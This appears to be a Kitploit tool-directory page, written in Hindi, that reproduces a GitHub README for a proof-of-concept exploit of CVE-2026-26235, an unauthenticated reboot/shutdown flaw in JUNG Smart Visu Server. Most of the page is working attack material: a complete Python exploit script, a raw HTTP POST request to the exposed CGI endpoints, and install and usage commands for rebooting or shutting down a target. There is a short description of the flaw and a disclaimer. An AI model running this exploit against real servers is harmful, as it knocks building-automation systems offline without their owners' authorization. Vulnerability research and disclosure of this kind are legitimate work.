Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown — # CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट JUNG Smart Visu Server <=1.1.1050 में एक अनप्रमाणित डिनायल-ऑफ-सर्विस भेद्यता, जो उजागर CGI एंडपॉइंट्स के माध्यम से रिमोट रीबूट या शटडाउन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

# CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट JUNG Smart Visu Server <=1.1.1050 में एक अनप्रमाणित डिनायल-ऑफ-सर्विस भेद्यता, जो उजागर CGI एंडपॉइंट्स के माध्यम से रिमोट रीबूट या शटडाउन की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

👤 लेखक

मोहम्मद इदरीस बन्यामेर

  • 📍 देश: जॉर्डन
  • 📸 इंस्टाग्राम: @banyamer_security

Python Version CVE CVSS CWE Author

CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट - JUNG Smart Visu Server ≤ 1.1.1050 में लापता प्रमाणीकरण के माध्यम से बिना प्रमाणीकरण के सेवा से इनकार (Denial of Service)।


🚨 भेद्यता विवरण

CVE-2026-26235 JUNG Smart Visu Server संस्करण ≤ 1.1.1050 में एक बिना प्रमाणीकरण के सेवा से इनकार (denial of service) भेद्यता है। यह उत्पाद महत्वपूर्ण सिस्टम प्रबंधन कार्यों के लिए प्रमाणीकरण लागू करने में विफल रहता है, जिससे दूरस्थ हमलावर एक ही POST अनुरोध के साथ सर्वर को रीबूट या बंद कर सकते हैं।

एंडपॉइंट /cgi-bin/reboot.sh और /cgi-bin/shutdown.sh बिना किसी प्रमाणीकरण जांच के उजागर होते हैं। इन सिस्टम-स्तरीय कमांड को ट्रिगर करने के लिए कोई सत्र टोकन, API कुंजी या क्रेडेंशियल की आवश्यकता नहीं है।

यह अनुमति देता है:

  • बिना प्रमाणीकरण के सिस्टम रीबूट/शटडाउन
  • कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं
  • पूर्ण सेवा व्यवधान
  • लगातार सेवा से इनकार

🎯 प्रभावित संस्करण

स्थितिसंस्करण
❌ कमजोरJUNG Smart Visu Server ≤ 1.1.1050
✅ पैच किया गयाअभी तक जारी नहीं किया गया

परीक्षण किया गया: JUNG Smart Visu Server 1.1.1050, एम्बेडेड लिनक्स


💥 प्रभाव


🔬 तकनीकी विवरण

मूल कारण

  1. लापता प्रमाणीकरण - CWE-306: उत्पाद महत्वपूर्ण सिस्टम कार्यों के लिए कोई प्रमाणीकरण नहीं करता है
  2. उजागर CGI एंडपॉइंट - /cgi-bin/reboot.sh और /cgi-bin/shutdown.sh सार्वजनिक रूप से सुलभ हैं
  3. कोई सत्र सत्यापन नहीं - कोई कुकी, टोकन या क्रेडेंशियल सत्यापन नहीं होता है
  4. प्रत्यक्ष सिस्टम कमांड निष्पादन - CGI स्क्रिप्ट विशेषाधिकार जांच के बिना सिस्टम रीबूट/शटडाउन कमांड निष्पादित करती हैं

भेद्यता प्रवाह

root@kitploit:~
हमलावर → POST /cgi-bin/reboot.sh → कोई प्रमाणीकरण जांच नहीं → सिस्टम रीबूट → DoS
हमलावर → POST /cgi-bin/shutdown.sh → कोई प्रमाणीकरण जांच नहीं → सिस्टम शटडाउन → DoS

🛠️ प्रूफ ऑफ कॉन्सेप्ट

पायथन एक्सप्लॉइट स्क्रिप्ट

root@kitploit:~
#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()

रॉ HTTP अनुरोध

root@kitploit:~
POST /cgi-bin/reboot.sh HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Origin: http://192.168.1.100:8080
Referer: http://192.168.1.100:8080/
DNT: 1
Sec-GPC: 1
Content-Length: 0


📦 स्थापना

root@kitploit:~
git clone https://github.com/banyamer-security/CVE-2026-26235.git
cd CVE-2026-26235
pip install requests
chmod +x CVE-2026-26235.py

🚀 उपयोग

मूल रीबूट

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080

शटडाउन

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080 -a shutdown

SSL सत्यापन अक्षम करें

root@kitploit:~
python3 CVE-2026-26235.py https://smartvisu.local -k

कस्टम टाइमआउट

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080 -t 15

सहायता

root@kitploit:~
python3 CVE-2026-26235.py -h

अपेक्षित आउटपुट

root@kitploit:~
============================================================
 JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC
 CVE-2026-26235 | CWE-306
============================================================

[*] Starting exploit against: https://192.168.1.100:8080

[*] Target      : https://192.168.1.100:8080/cgi-bin/reboot.sh
[*] Action      : REBOOT
[*] SSL Verify  : False
[*] Sending unauthenticated POST request...

[+] Request sent successfully!
[+] HTTP Status : 200
[!] Server responded with 200 OK - action likely executed

[!] If successful, the target server should now be restarting.
[+] Exploit completed successfully.

📚 संदर्भ

  • VulnCheck सलाह
  • Zero Science Lab - ZSL-2026-5971
  • CWE-306: महत्वपूर्ण कार्य के लिए लापता प्रमाणीकरण
  • NVD - CVE-2026-26235 (लंबित)

👤 लेखक

मोहम्मद इदरीस बन्यामेर

  • 📍 देश: जॉर्डन
  • 📸 इंस्टाग्राम: @banyamer_security
  • 🐙 GitHub: banyamer-security
  • 🔗 LinkedIn: मोहम्मद बन्यामेर
  • 📧 ईमेल: [email protected]

⚠️ अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

उन सिस्टमों के खिलाफ अनधिकृत परीक्षण जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।


📄 लाइसेंस

MIT लाइसेंस

कॉपीराइट (c) 2026 मोहम्मद इदरीस बन्यामेर

इसके द्वारा, किसी भी व्यक्ति को इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने पर, बिना किसी प्रतिबंध के सॉफ़्टवेयर में व्यवहार करने की अनुमति निःशुल्क दी जाती है, जिसमें बिना किसी प्रतिबंध के उपयोग, प्रतिलिपि, संशोधन, विलय, प्रकाशित, वितरित, उपलाइसेंस और/या सॉफ़्टवेयर की प्रतियां बेचने के अधिकार शामिल हैं, और उन व्यक्तियों को अनुमति देने के लिए जिन्हें सॉफ़्टवेयर प्रदान किया गया है, निम्नलिखित शर्तों के अधीन:

उपरोक्त कॉपीराइट नोटिस और यह अनुमति नोटिस सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल किए जाएंगे।

सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और उल्लंघन की वारंटी शामिल हैं लेकिन इन्हीं तक सीमित नहीं। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध, टोर्ट या अन्यथा के कार्य में हो, जो सॉफ़्टवेयर से या सॉफ़्टवेयर के उपयोग या अन्य लेन-देन से उत्पन्न होता है या उससे संबंधित है।


⭐ समर्थन

यदि इस एक्सप्लॉइट ने आपके शोध या परीक्षण में मदद की:

  • ⭐ इस रिपॉजिटरी को स्टार करें
  • 🔁 अन्य शोधकर्ताओं के साथ साझा करें
  • 📢 इंस्टाग्राम पर @banyamer_security को फॉलो करें

जिम्मेदार प्रकटीकरण • सुरक्षा अनुसंधान • CVE-2026-26235

टूल डाउनलोड करें
वेक्टरविवरण
CVSS v48.7 (उच्च) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
प्रमाणीकरणकोई नहीं - पूरी तरह से बिना प्रमाणीकरण
हमला वेक्टरनेटवर्क
जटिलताकम
प्रभावउच्च उपलब्धता प्रभाव